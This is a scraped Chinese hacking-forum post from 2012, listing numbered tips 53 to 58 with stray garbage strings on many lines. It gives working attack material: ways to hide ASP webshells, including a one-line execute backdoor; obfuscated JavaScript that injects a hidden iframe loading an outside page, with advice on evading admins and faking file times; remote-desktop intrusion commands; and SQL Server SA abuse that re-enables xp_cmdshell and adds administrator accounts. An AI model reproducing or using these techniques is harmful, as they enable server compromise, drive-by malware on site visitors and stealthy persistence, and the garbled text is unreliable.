2 W3 S- R7 f3 e; m% g- E4 s6 r' W5 |, h1 |! b
53、隐藏ASP后门的两种方法- Y- R4 @; W: z* j# ^
1、建立非标准目录:mkdir images..\: Q/ V' i# z( x1 b6 t
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
4 R! B1 S+ `& }) z1 e, L" @( `; \ d通过web访问ASP木马:http://ip/images../news.asp?action=login
4 @8 U+ r# s: {6 v* q如何删除非标准目录:rmdir images..\ /s
$ R: |/ Y$ s+ x8 f# d7 k! |2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
. p" J: \; w5 G' }; X* pmkdir programme.asp$ v$ N+ T, W) m0 y) o- T1 s' }
新建1.txt文件内容:<!--#include file=”12.jpg”-->/ i' Z7 H- ?, }* z$ c
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
# c0 W; d) R5 ]* t* o+ mattrib +H +S programme.asp
) U3 `" u" P8 {+ g( _' C; p6 [通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt. e1 F3 c2 M `# c2 E: |
; n& `3 E" z5 X) R
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
" Q4 E S7 r' m) ^/ h. G然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
) P: B& S0 ^1 D m6 ~2 A
) {' L b" T2 Q( Z$ l8 I7 a) m! ~55、JS隐蔽挂马& j; @- O1 |2 H& V
1.9 i& j& q1 l/ C
var tr4c3="<iframe src=ht";* E( H6 g: _: J5 R
tr4c3 = tr4c3+"tp:/";
% w" ~& A6 U p2 E) Ttr4c3 = tr4c3+"/ww";
( a8 `+ A8 |% C7 ~9 T3 S+ Ctr4c3 = tr4c3+"w.tr4";& S9 Y4 t/ U H* T2 p$ a
tr4c3 = tr4c3+"c3.com/inc/m";
8 P: N5 p F8 N3 s. R* o% K2 `! _* ltr4c3 = tr4c3+"m.htm style="display:none"></i";5 @- s- B3 g' r
tr4c3 =tr4c3+"frame>'";
' u/ E9 W; K; w: G8 p) w- _* ldocument.write(tr4c3);
" b; E/ `; L) e+ w! ^避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
% O8 w4 C3 u, |; U4 T4 b# }, T" K0 F( l6 I8 @( J
2.3 e# [- n; P' }! i$ y+ I, C
转换进制,然后用EVAL执行。如6 }( z" ?' R+ X7 B+ g" l" e0 G
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");2 v! l* M# @8 B) E) P+ @3 T p/ {4 c6 i
不过这个有点显眼。& z" h* Y( h- u5 }9 z" l( |
3.
* X- |4 @2 P1 p; K# U0 h/ ddocument.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');# _+ i; ~( `. U0 ^
最后一点,别忘了把文件的时间也修改下。1 H" Y2 x" [' d
' q8 x9 p$ ]/ z- P% x
56.3389终端入侵常用DOS命令" \9 w6 s8 |4 C5 I( ?6 n, a
taskkill taskkill /PID 1248 /t
/ N# G! n2 V. H( `. j8 f1 U# H: b8 I i
0 [1 q. ]8 d" N+ m& m- Etasklist 查进程
3 ^2 I |/ p1 K, |: p; q& p7 z* u
4 Q% Q# @) W' x" jcacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
9 C# k3 r! P; liisreset /reboot
# F; Z$ y# {3 h7 V+ d8 \* ltsshutdn /reboot /delay:1 重起服务器3 u" L% ^4 B2 r9 J$ L
1 d. Q0 u/ v! r' `. Y8 o) [0 a' ulogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
6 S& w5 w4 V1 Q( C- }7 `3 \" m5 ~+ E, y* r
query user 查看当前终端用户在线情况
0 d: J) l t. V0 g6 ]
2 z) c. h' _% C0 m3 @! z要显示有关所有会话使用的进程的信息,请键入:query process *
- @7 Q( q- S& J% F* ] Y
8 F4 V; d# Y9 o6 r; C( v7 s要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
1 y9 d9 t' V1 D' L) ?) r# K& S- O6 y% R8 ^# f/ f8 W
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER27 C7 i, S5 q3 \# H* {* p: a, _; G* Y7 a
2 T! T# ~ t8 s
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02! `0 f4 X: C, k( d% K- r
- x+ ]( a4 k' J4 ?) h& \命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启/ }, B, w' y) o1 v5 o+ s% h3 B5 b& l
7 m/ _! v8 s j* R0 A0 M) y
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统! x( ` x) k6 S6 k& ~3 c/ [
. {; _4 Y9 J" \5 s# T( M
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
0 i8 @% [& t$ D1 {1 r/ m4 M
B. I) X8 T8 ]" R命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机& Z5 _# l' K' L% ^/ `
2 z1 u% s5 \$ ?& \/ R7 |8 P
56、在地址栏或按Ctrl+O,输入:4 r. Y ~: r! R* G# r, u
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;# [, w: C; z+ i$ M! G2 @
, [' g$ `( j- _4 W* ~; R |源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。5 J3 w/ P# b7 N1 Z. s0 O0 K( ?
' K3 L# ^ R# z% x& E: T- q5 p
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
/ c# [( Q; U/ O# G: l8 d) v用net localgroup administrators是可以看到管理组下,加了$的用户的。6 \& P4 b9 l b1 `2 ^
: {7 L1 Y( h; j. y# R58、 sa弱口令相关命令, ^1 O' _! E* b+ `. {+ i
' Q( w; V2 ~: I
一.更改sa口令方法:, G) i' p- h) ?9 d5 ]9 v- o
用sql综合利用工具连接后,执行命令:
" _ }: t" P$ W9 X/ Xexec sp_password NULL,'20001001','sa'$ a; _ ^# v. F% z0 }
(提示:慎用!)
1 G t) y! R) ~; ^- y9 }# b5 i3 K0 \/ { X
二.简单修补sa弱口令.4 l. s( g: [+ j) H) {6 r# X
, w3 u2 j; Z& ^7 e( M5 t5 j% T
方法1:查询分离器连接后执行:+ q2 f/ n* h, o- ~5 d" Y8 }$ L6 Q
if exists (select * from' E; T/ N) e% c: w
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
0 {& R1 Q. b% |% L. p+ ?# bOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
% @+ ?% Y# w4 I, w0 k9 ?, z. F! j
- ]. j6 J& ?% g! b" r( `- sexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
4 I: f3 P: t2 G- t m5 t$ f+ v4 {4 L6 x4 T6 J
GO; h/ E$ L) u- T0 k: w, e2 g0 z
3 c( `% \4 o& n$ p5 m+ d: }然后按F5键命令执行完毕
7 R+ Q" |9 o# l6 D+ S: m: g/ Y1 ]0 X5 Z0 X
方法2:查询分离器连接后
8 S3 e6 t; G4 g第一步执行:use master1 a8 n3 E, L: l; d! |9 Y5 }- M) F* [
第二步执行:sp_dropextendedproc 'xp_cmdshell'
+ a( Z% f3 r, x' U l然后按F5键命令执行完毕
0 p0 n3 m) a" Z4 V# g3 d, X$ u) }9 j$ A
1 R+ M; N3 q7 _( e! K
三.常见情况恢复执行xp_cmdshell.
/ H' Y+ t- P3 y( G" \3 ]7 {
7 T0 W& d) v8 J" M# Q3 i2 k
: c7 [5 _* l# ?8 e( L l1 未能找到存储过程'master..xpcmdshell'.
9 ~" B5 w# Z% K7 k# ~. s 恢复方法:查询分离器连接后,* N6 s% H; t4 `
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int/ X. `- _! g6 F' i6 @: d+ t
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
5 Z' e1 X" Y. Q* [5 {然后按F5键命令执行完毕& l3 m; Q L6 E+ B7 p7 W
/ g0 B2 |) e5 k) K. j1 i
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。) N( }4 H+ o( n, M1 ~
恢复方法:查询分离器连接后,
3 ]' O- q; \$ x+ \6 ~第一步执行:sp_dropextendedproc "xp_cmdshell"
* }6 `# B, k( j p6 m) i/ V第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'$ N& [, p* \* g% g1 X
然后按F5键命令执行完毕" c+ ?4 T& w) \2 K# `8 u3 H, D
6 C' ~ R( F% h3 J' C' R/ R3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
0 ]7 c$ |* C: d! k+ Q" n恢复方法:查询分离器连接后,
0 S; g0 w$ B5 _第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
3 M& |9 u3 d7 S1 n/ X7 M4 O第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
5 d1 b' b5 A) T2 k' B. _* I* Z5 t然后按F5键命令执行完毕9 G0 y$ H) x6 e9 [. @: \
: J( Q- l3 o( D' O: X
四.终极方法.) S. ]; J) E" |% y$ w8 u+ N# l- v
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:! ^, l- b6 I6 u) A6 l; {7 n+ M
查询分离器连接后,: ]7 l6 ] X( g$ `, p" f
2000servser系统:8 X# _4 C0 Y# U4 q; \ t
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'0 ^, y% G: a# n( K& v& g' ], I
; |2 [) K( _' ]3 O: g1 G, Ydeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'# i' A0 b8 V1 @" O' a: G# \1 U/ J
3 g: u/ `) }/ b) t. }' H$ C6 sxp或2003server系统:
, t; H7 s) x+ `2 F; v5 O: j. s/ U& r- O% G4 E: D' c
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
; y4 j2 d( H! T% h$ L0 i4 v( w8 c( N* a1 x& n2 Q8 f2 I; O* m
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add', c- ?9 L# V! K+ W, E7 m( _
|
发表于 2012-9-15 14:13:15
收藏
支持
反对